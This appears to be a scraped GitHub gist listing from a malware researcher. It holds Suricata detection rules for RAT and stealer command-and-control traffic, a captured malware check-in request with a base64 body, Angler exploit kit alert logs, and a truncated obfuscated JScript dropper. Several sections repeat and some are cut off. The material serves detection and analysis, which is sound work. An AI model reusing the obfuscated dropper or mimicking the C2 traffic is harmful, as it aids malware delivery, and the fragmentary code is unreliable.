Jack malwareforme

## gist:816819b7a130304de0bfa6cb800ee868
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE StrifeWater RAT CnC Activity"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; endswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|token|22|"; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|tid|22|"; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|apiData|22|"; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|data|22 3b 20|filename=|22|data|22 0d 0a|Content-Type|3a 20|application/octet-stream|0d 0a|"; fast_pattern; http.header_names; content:!"Referer"; classtype:command-and-control; reference:url,www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations; reference:md5,a70d6bbf2acb62e257c98cb0450f4fec; sid:1602; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET USER_AGENTS Observed Non-standard User-Agent (example/1.0)"; flow:established,to_server; http.header; content:"User-Agent|

## unk.stealer suri5 sig
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Win32/Unk.Lebov Stealer CnC Exfil"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; endswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name=|22|file|22 0d 0a 0d 0a|"; content:".zip|0d 0a|"; distance:0; within:50; content:"|0d 0a|PK"; distance:0; content:"system.txt"; distance:0; fast_pattern; http.header_names; content:!"Referer"; content:!"User-Agent"; reference:md5,8124a572f854007e63cc7337547a37af; classtype:trojan-activity; sid:12345; rev:1;)

## gist:3f860f6bd3b79f503f935a0a509bf7ca
alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Observed Malicious SSL Cert (ElegyRAT)"; flow:established,to_client; tls.cert_subject; content:"CN=ElegyRAT Server"; fast_pattern; endswith; tls.cert_issuer; content:"CN=ElegyRAT Server"; endswith; reference:md5,a24cae9f6cf137e0e72817a1879f0acf; classtype:domain-c2; sid:10000000; rev:1;)

## gist:2ca4771d981f061a8c5054416049fefd
https://app.any.run/tasks/c9b7183c-011b-4a50-96cc-b09c2876b183/

POST /request HTTP/1.1
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: rvOgJiq
Host: weloverocknroll.online
Content-Length: 640

request=YUhkcFpEMWxaV1ZpTldRMU5DMDNPRGd3TFRReVlUY3RZalUwTWkwM016bGlZbU15Tm1ObU5HSW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpFdU15Wm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFV1RBbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzliV0ZwYmc9PQ==

## gist:a68a8ec300e549f1f06f
2015-09-23 Angler EK
ETPRO.Suri.2.0.8

2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M1
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M2
2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M3
2015-09-23 02:32:42.00 UTC - 192.168.26.10:1325 -> 62.109.5.133:80 - ETPRO CURRENT_EVENTS Angler Possible EK Landing URI Struct Jul 15 M3 T1
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 16 2015 M5
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 1 2015
2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing Sep 22 2015 T1 M1

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                malwareforme
                / keybase.md
            
            
              Created
              July 23, 2015 14:53
            
          
    Keybase proof

I hereby claim:

I am malwareforme on github.
I am malwareforme (https://keybase.io/malwareforme) on keybase.
I have a public key whose fingerprint is BDE4 6403 4E5B 0474 E345  EA6F 4CF5 EDCF 62AC 0200

To claim this, I am signing this object:

  
## gist:adad23f5132c2207bfdf
(function() {
    var yn4 = "MOYpSB=Q2Nji=gK&Qe@d1p" [(35.0 + "QE\x8bf\x60\x83ZyiY8I$=" ["charCodeAt"](13) * 826342734)["toString"]((0 * "$L+OA\x89\x84Q\x80|x0" ["charCodeAt"](3) + 35.0))](/[Y\=jK\@M2e\&1S]/g, "");
    gD7 = ("#Cv$Z\x88u'+s-GxVy\x82" ["charCodeAt"](7) * 2 + 23.0);
    var pew = ("ZA|9m]c5NX',si" ["length"] * 31 + 1.0);
    jfa = (9 * "Ff1#]WSlV7aK" ["length"] + 6.0);
    Am5 = ("e$|R9Da=,]s3I\x8bu5O" ["charCodeAt"](8) * 5 + 30.0);

    function LC2(fr, ERo, rn) {
        var QDy = new ActiveXObject("~Wo]S7BczrziQ=pC_tA.;SPhqe`~lHyl" [(2217011921 * "nV8cvmy=[KH" ["length"] + 2.0)["toString"]((3 * "\x86XIg\x8a_4^t" ["length"] + 4.0))](/[yPQ7o\`\=qz\~HC\_AB\]\;]/g, ""));
        N5D = "vsQTm;CQCNEDWAYGTxL>R>n" [("C\x87N0uc)#'oR-_" ["charCodeAt"](6) * 488878692 + 2.0)["toString"](("?a(I6^'Nl\x83E\x80\x81_" ["charCodeAt"](4) * 0 + 30.0))](/[NL\;\>WQTYEv]/g, "");
	alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE StrifeWater RAT CnC Activity"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; endswith; http.request_body; content:"Content-Disposition\|3a 20\|form-data\|3b 20\|name=\|22\|token\|22\|"; content:"Content-Disposition\|3a 20\|form-data\|3b 20\|name=\|22\|tid\|22\|"; content:"Content-Disposition\|3a 20\|form-data\|3b 20\|name=\|22\|apiData\|22\|"; content:"Content-Disposition\|3a 20\|form-data\|3b 20\|name=\|22\|data\|22 3b 20\|filename=\|22\|data\|22 0d 0a\|Content-Type\|3a 20\|application/octet-stream\|0d 0a\|"; fast_pattern; http.header_names; content:!"Referer"; classtype:command-and-control; reference:url,www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations; reference:md5,a70d6bbf2acb62e257c98cb0450f4fec; sid:1602; rev:1;)

	alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET USER_AGENTS Observed Non-standard User-Agent (example/1.0)"; flow:established,to_server; http.header; content:"User-Agent\|
	https://app.any.run/tasks/c9b7183c-011b-4a50-96cc-b09c2876b183/

	POST /request HTTP/1.1
	Accept: text/plain
	Content-Type: application/x-www-form-urlencoded
	User-Agent: rvOgJiq
	Host: weloverocknroll.online
	Content-Length: 640

	request=YUhkcFpEMWxaV1ZpTldRMU5DMDNPRGd3TFRReVlUY3RZalUwTWkwM016bGlZbU15Tm1ObU5HSW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpFdU15Wm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFV1RBbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzliV0ZwYmc9PQ==
	2015-09-23 Angler EK
	ETPRO.Suri.2.0.8

	2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M1
	2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M2
	2015-09-23 02:32:39.09 UTC - 87.98.177.124:80 -> 192.168.26.10:1276 - ETPRO CURRENT_EVENTS Evil Redirector Leading to EK Aug 31 2015 M3
	2015-09-23 02:32:42.00 UTC - 192.168.26.10:1325 -> 62.109.5.133:80 - ETPRO CURRENT_EVENTS Angler Possible EK Landing URI Struct Jul 15 M3 T1
	2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 16 2015 M5
	2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing June 1 2015
	2015-09-23 02:32:42.38 UTC - 62.109.5.133:80 -> 192.168.26.10:1325 - ETPRO CURRENT_EVENTS Angler EK Landing Sep 22 2015 T1 M1
	(function() {
	var yn4 = "MOYpSB=Q2Nji=gK&Qe@d1p" [(35.0 + "QE\x8bf\x60\x83ZyiY8I$=" ["charCodeAt"](13) * 826342734)["toString"]((0 * "$L+OA\x89\x84Q\x80\|x0" ["charCodeAt"](3) + 35.0))](/[Y\=jK\@M2e\&1S]/g, "");
	gD7 = ("#Cv$Z\x88u'+s-GxVy\x82" ["charCodeAt"](7) * 2 + 23.0);
	var pew = ("ZA\|9m]c5NX',si" ["length"] * 31 + 1.0);
	jfa = (9 * "Ff1#]WSlV7aK" ["length"] + 6.0);
	Am5 = ("e$\|R9Da=,]s3I\x8bu5O" ["charCodeAt"](8) * 5 + 30.0);

	function LC2(fr, ERo, rn) {
	var QDy = new ActiveXObject("~Wo]S7BczrziQ=pC_tA.;SPhqe`~lHyl" [(2217011921 * "nV8cvmy=[KH" ["length"] + 2.0)["toString"]((3 * "\x86XIg\x8a_4^t" ["length"] + 4.0))](/[yPQ7o\`\=qz\~HC\_AB\]\;]/g, ""));
	N5D = "vsQTm;CQCNEDWAYGTxL>R>n" [("C\x87N0uc)#'oR-_" ["charCodeAt"](6) * 488878692 + 2.0)["toString"](("?a(I6^'Nl\x83E\x80\x81_" ["charCodeAt"](4) * 0 + 30.0))](/[NL\;\>WQTYEv]/g, "");